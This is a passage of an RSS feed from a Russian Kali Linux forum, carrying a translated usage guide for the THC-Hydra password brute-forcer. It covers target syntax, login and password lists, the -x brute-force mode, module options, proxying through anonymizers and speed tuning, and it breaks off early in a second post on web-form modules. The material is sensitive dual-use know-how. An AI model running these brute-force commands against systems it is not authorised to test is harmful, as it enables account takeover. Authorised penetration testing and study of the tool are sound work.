очень интересуют популярные роутеры D-Link, то я набираю&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;sh dpl4hydra.sh d-link&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;По идее, должен сгенерироваться файл с дефолтными паролями устройств D-Link, но этого не происходит из-за каких-то ошибок парсинга.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Графический интерфейс Hydra&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Запуск:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;xhydra&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Hydra в командной строке&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Для использования в командной строке синтаксис следующий:&lt;br /&gt;&lt;br /&gt;Для атаки одной цели или сети, вы можете использовать новый стиль ://&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra &amp;#91;некоторые опции командной строки] ПРОТОКОЛ://ЦЕЛЬ:ПОРТ/ОПЦИИ&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;Старая старый синтаксис также поддерживается, а если вы хотите, то дополнительно можете задать цели из текстового файла, при этом вы *должны* использовать этот синтаксис:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra &amp;#91;некоторые опции командной строки] &amp;#91;-s порт] ЦЕЛЬ ПРОТОКОЛ ОПЦИИ&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Через опции командной строки вы определяете, какие логины и пароли перебирать, нужно ли использовать SSL, во сколько потоков осуществлять атаку и т.д.&lt;br /&gt;&lt;br /&gt;ПРОТОКОЛ - это протокол, который вы хотите атаковать, например, ftp, smtp, http-get или любой из доступных&lt;br /&gt;&lt;br /&gt;ЦЕЛЬ - это целевая машина, которую вы хотите атаковать&lt;br /&gt;&lt;br /&gt;TARGET is the target you want to attack&lt;br /&gt;&lt;br /&gt;ОПЦИИ дополнительные значения, которые задаются для модуля ПРОТОКОЛ&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Первое&lt;/b&gt; - выберите вашу цель&lt;br /&gt;&lt;br /&gt;есть три способа задать цель для атаки:&lt;br /&gt;&lt;br /&gt;a) единичная цель в командной строке: просто введите IP или DNS адрес&lt;br /&gt;b) диапазон подсети в командной строке:&lt;br /&gt;c) список хостов в текстовом файле: один хост на строку (подробности ниже)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Второе&lt;/b&gt; - выберите ваш протоколов&lt;br /&gt;&lt;br /&gt;Старайтесь избегать telnet, так как нельзя надёжно определить, соединение успешно или нет. Используйте сканер портов, чтобы увидеть, какие протоколы включены на целе.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Третье&lt;/b&gt; - проверьте, имеет ли модуль дополнительные параметры&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -U ПРОТОКОЛ&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -U smtp&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Четвёртое&lt;/b&gt; - порт назначение&lt;br /&gt;&lt;br /&gt;Это необязательно! Если на удалённой машине используется порт по умолчанию для этой службы, то программа hydra сама знает, какие порты используется для ПРОТОКОЛов&lt;br /&gt;&lt;br /&gt;Если вы задали использовать SSL (опция &quot;-S&quot;), то по умолчанию будет использоваться обычный порт SSL.&lt;br /&gt;&lt;br /&gt;Если вы используете нотацию &quot;://&quot;, то вы должны использовать квадратные скобки [ ], если вы хотите цель для атак определить адресами IPv6 или CIDR (&quot;192.168.0.0/24&quot;)&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra &amp;#91;некоторые опции командной строки] &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;ftp://&amp;#91;192.168.0.0/24]/&quot;&gt;ftp://&amp;#91;192.168.0.0/24]/&lt;/a&gt; &lt;br /&gt;hydra &amp;#91;некоторые опции командной строки] -6 smtp://&amp;#91;2001:db8::1]/NTLM&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Обратите внимание, что hydra делает все атаки только на IPv4!&lt;br /&gt;&lt;br /&gt;Если вы хотите атаковать адреса IPv6 вы должны добавить опцию &quot;-6&quot;. Тогда все атаки будут на IPv6.&lt;br /&gt;&lt;br /&gt;Если вы хотите задать цели через текстовый файл, вы не можете использовать обозначение ://, используйте старый стиль и задайте протокол (и опции модуля):&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra &amp;#91;некоторые опции командной строки] -M targets.txt ftp&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Вы также можете указать порт для каждой цели, добавив &quot;:&lt;порт&gt;&quot; после каждой записи цели в файле, например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;foo.bar.com&lt;br /&gt;target.com:21&lt;br /&gt;unusual.port.com:2121&lt;br /&gt;default.used.here.com&lt;br /&gt;127.0.0.1&lt;br /&gt;127.0.0.1:2121&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Обратите внимание, если вы хотите присоединить цели IPv6, вы должны указать опцию -6 и должны поместить адреса IPv6 в квадратные скобки в файле (!) примерно так:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;foo.bar.com&lt;br /&gt;target.com:21&lt;br /&gt;&amp;#91;fe80::1%eth0]&lt;br /&gt;&amp;#91;2001::1]&lt;br /&gt;&amp;#91;2002::2]:8080&lt;br /&gt;&amp;#91;2a01:24a:133:0:00:123:ff:1a]&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Логины и пароли Hydra&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Есть много разных опций, как атаковать с логинами и паролями.&lt;br /&gt;&lt;br /&gt;Опциями -l для логина и -p для пароля, вы можете сказать hydra использовать только эти логин и/или пароль для попытки.&lt;br /&gt;С -L для логинов и -P для паролей вы указываете текстовые файлы с записями, например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -l admin -p password &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;ftp://localhost/&quot;&gt;ftp://localhost/&lt;/a&gt; &lt;br /&gt;hydra -L default_logins.txt -p test &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;ftp://localhost/&quot;&gt;ftp://localhost/&lt;/a&gt; &lt;br /&gt;hydra -l admin -P common_passwords.txt &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;ftp://localhost/&quot;&gt;ftp://localhost/&lt;/a&gt; &lt;br /&gt;hydra -L logins.txt -P passwords.txt &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;ftp://localhost/&quot;&gt;ftp://localhost/&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Дополнительно вы также можете пробовать пароли, основанные на логины, это делается опцией &quot;-e&quot;.&lt;br /&gt;&lt;br /&gt;Опция &quot;-e&quot; имеет три параметра:&lt;br /&gt;&lt;br /&gt;1) s - пробовать логин как пароль&lt;br /&gt;2) n - пробовать пустой пароль&lt;br /&gt;3) r - перестановка в логине символов с зада на перёд и использование получившегося слова в качестве пароля&lt;br /&gt;К примеру, если вы хотите попробовать логин в качестве пароля и пустой пароль, то вам нужно в командной строке указать &quot;-e sn&quot;.&lt;br /&gt;&lt;br /&gt;Для пароля кроме -p/-P есть ещё пара режимов:&lt;br /&gt;&lt;br /&gt;Вы можете использовать текстовый файл, в котором логины и пароли разделены двоеточием, например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;admin:password&lt;br /&gt;test:test&lt;br /&gt;foo:bar&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Это популярный стиль записи листинга дефольтных значений аккаунта. В таком же виде генерирует файлы dpl4hydra.sh (генератор дефолтных логинов и паролей для hydra).&lt;br /&gt;&lt;br /&gt;Использовать такой текстовый файл нужно с опцией -C, обратите внимание, что в этом режиме нельзя использовать опции -l/-L/-p/-P (хотя -e nsr можно).&lt;br /&gt;&lt;br /&gt;Пример:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -C default_accounts.txt &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;ftp://localhost/&quot;&gt;ftp://localhost/&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;И наконец, есть режим брутфорса с опцией -x (её нельзя использовать с -p/-P/-C):&lt;br /&gt;&lt;br /&gt;-x минимальная_длина:максимальная_длина:набор_символов&lt;br /&gt;&lt;br /&gt;Набор символов определяет &apos;a&apos; для букв в нижнем регистре, &apos;A&apos; — для букв в вернем регистре, &apos;1&apos; — для цифр, а для всего другого используйте их реальные символы.&lt;br /&gt;&lt;br /&gt;Примеры:&lt;br /&gt;&lt;br /&gt;-x 1:3:a генерирует пароли длинной от 1 до 3 символов, состоящие только из букв в нижнем регистре&lt;br /&gt;-x 2:5:/ генерирует пароли длинной от 2 до 5 символов, содержание только слэши&lt;br /&gt;-x 5:8:A1 генерирует пароли длинной от 5 до 8 символов, с большими буквами и цифрами&lt;br /&gt;&lt;br /&gt;Пример:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -l ftp -x 3:3:a &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;ftp://localhost/&quot;&gt;ftp://localhost/&lt;/a&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Специальные опции для модулей&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Через третий параметр командной строки (ЦЕЛЬ СЛУЖБА ОПЦИИ) или после ключа -m, вы можете передать модулю одну опцию.&lt;br /&gt;&lt;br /&gt;Многие модули используют их, а некоторые требуют их!&lt;br /&gt;&lt;br /&gt;Чтобы получить дополнительную информацию по опции модуля, наберите&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -U &lt;модуль&gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -U http-post-form&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Специальные опции могут быть переданы через параметр -m или третьей опцией в командной строке или в формате служба://цель/опция.&lt;br /&gt;&lt;br /&gt;Примеры (они все означают одно и то же):&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;hydra -l test -p test -m PLAIN 127.0.0.1 imap&lt;br /&gt;hydra -l test -p test 127.0.0.1 imap PLAIN&lt;br /&gt;hydra -l test -p test imap://127.0.0.1/PLAIN&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Возобновление прерванной/оборванной сессии&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Когда hydra прерывается командой Control-C, убивается или вылетает с ошибкой, она оставляет файл &quot;hydra.restore&quot; в котором содержится вся необходимая информация для восстановления сессии. Этот файл сессии пишется каждые 5 минут.&lt;br /&gt;&lt;br /&gt;Примечание: файл hydra.restore НЕ может быть скопирован между различными платформами (например с little indian на big indian или с solaris на aix)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Как сканировать/взламывать через прокси&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Переменная среды HYDRA_PROXY_HTTP определяет веб прокси (это работает только для службы http/www!)&lt;br /&gt;&lt;br /&gt;Следующий синтаксис является валидными:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;HYDRA_PROXY_HTTP=&quot;http&amp;#58;//123.45.67.89:8080/&quot;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Для всех остальных служб используйте переменную HYDRA_PROXY для сканирования/взлома через дефолтный вызов веб-прокси CONNECT. Он использует тот же самый синтаксис, например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;HYDRA_PROXY=&amp;#91;http|socks4|socks5]://proxy_addr:proxy_port&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;например:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;HYDRA_PROXY=http&amp;#58;//proxy.anonymizer.com:8000&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Если на прокси необходима аутентификация, используйте переменную окружения HYDRA_PROXY_AUTH:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;HYDRA_PROXY_AUTH=&quot;the_login:the_password&quot;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Дополнительные подсказки&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;сортируйте ваши файлы с паролями по вероятности и используйте опцию -u для нахождения паролей намного быстрее!&lt;br /&gt;пропускайте ваши словари через команду uniq, чтобы они содержали только уникальные записи!&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;cat words.txt | sort | uniq &gt; dictionary.txt&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;если вы знаете, что цель использует политику паролей (позволяя пользователям выбирать пароли только с минимальной длинной от 6 символов, содержащих по крайней мере одну букву и одну цифру и т. д., используйте инструмент pw-inspector, который поставляется вместе с пакетом hydra для уменьшения списка паролей:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;cat dictionary.txt | pw-inspector -m 6 -c 2 -n &gt; passlist.txt&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color:#980000&quot;&gt;Скорость hydra&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Благодаря функции множественных одновременных запросов, этот инструмент взлома паролей может быть очень быстрым. Тем не менее, скорость зависит от протокола. Самыми быстрыми являются POP3 и FTP.&lt;br /&gt;&lt;br /&gt;Экспериментируйте с опцией &lt;b&gt;-t&lt;/b&gt; для ускорения! Чем выше - тем быстрее (! слишком высокое - отключение службы ! )</content:encoded>
			<category>Kali Linux</category>
			<dc:creator>Fresh</dc:creator>
			<guid>https://usehelp.clan.su/forum/17-20-1</guid>
		</item>
		<item>
			<title>Hydra. Брутфорсинг веб-сайтов - часть вторая</title>
			<link>https://usehelp.clan.su/forum/17-19-1</link>
			<pubDate>Mon, 28 Mar 2016 11:30:37 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://usehelp.clan.su/forum/17&quot;&gt;Kali Linux&lt;/a&gt;&lt;br /&gt;Описание темы: THC-Hydra - очень быстрый взломщик сетевого входа в систему&lt;br /&gt;Автор темы: Fresh&lt;br /&gt;Автор последнего сообщения: Fresh&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;span style=&quot;color:#980000&quot;&gt;&lt;b&gt;Модули http-post-form и http-get-form&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;По умолчанию эти модули сконфигурированы на следование максимум по пяти редиректам подряд. Они всегда собирают новые куки для одинаковых URL без значений.&lt;br /&gt;&lt;br /&gt;Параметр принимает три величины разделённых двоеточием &quot;:&quot;, плюс опциональную величину.&lt;br /&gt;&lt;br /&gt;(Примечание: если вам нужно двоеточие в строке опции в качестве значения, экранируйте его так &quot;&amp;#92;:&quot;, но не экранируйте &quot;&amp;#92;&quot; на &quot;&amp;#92;&amp;#92;&quot;.)&lt;br /&gt;&lt;br /&gt;Синтаксис:&lt;br /&gt;&lt;br /&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;url&gt;:&lt;параметры формы&gt;:&lt;строки условия&gt;&amp;#91;:&lt;опционально&gt;&amp;#91;:&lt;опционально&gt;]&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;&lt;br /&gt;&lt;br /&gt;Первое - это URL страницы на сервере, принимающей GET или POST.&lt;br /&gt;&lt;br /&gt;Второе - это величины &lt;b&gt;POST/GET&lt;/b&gt; (принятые хоть от браузера, прокси и т. д.) имена пользователя 